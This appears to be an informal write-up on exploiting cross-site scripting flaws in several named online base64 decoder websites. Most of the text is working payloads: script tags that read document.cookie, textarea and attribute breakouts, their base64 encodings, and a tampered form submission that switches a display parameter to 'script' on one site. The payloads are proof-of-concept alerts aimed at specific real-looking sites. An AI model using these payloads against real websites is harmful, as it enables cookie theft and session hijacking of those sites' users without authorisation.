http://base64-decode.php-functions.com/ | XSS

The idea is to use any data to decode (base64 in this case) and see if we can inject the xss.


http://base64-decode.php-functions.com/

other websites



http://www.motobit.com/util/base64-decoder-encoder.asp
http://www.shell-tools.net/index.php?op=base64_dec






We need to submit this string base64 encoded
 -------------------------------------------------------------

<html><head></head><body></textarea><script>alert(document.cookie);</script><textarea></body></html>

  -------------------------------------------------------------

PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjwvdGV4dGFyZWE+PHNjcmlwdD5hbGVydChkb2N1bWVu

dC5jb29raWUpOzwvc2NyaXB0Pjx0ZXh0YXJlYT48L2JvZHk+PC9odG1sPg==

 -------------------------------------------------------------


Note: The <textarea> tags are useless in this case but are working in the 90% of other similar cases that are showing the results in a textarea.


a different one with text input
 http://nc-designs.co.uk/tools/Base64 Encryption and Decryption/
----------------------------------------
"><script>alert(document.cookie);</script><"
----------------------------------------
Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7PC9zY3JpcHQ+PCI=


----------------------------------------


I've found another base64 decoder more trivial. with a few differences.
http://www.toastedspam.com/decode64
- it doesn't decode correctly the data
- it tries to remove/convert with some html entities <>


I've spent about ten minutes (sic) to achieve this XSS




The string to convert (b=a; is garbage to have a good string without random characters after decoding)

a=document.cookie; b=a; alert(a); 

The converted string

YT1kb2N1bWVudC5jb29raWU7IGI9YTsgYWxlcnQoYSk7

When we submit the data we should use tamper data (or firebug to change the html) and
change disp with script (disp=script) 


text=YT1kb2N1bWVudC5jb29raWU7IGI9YTsgYWxlcnQoYSk7&disp=script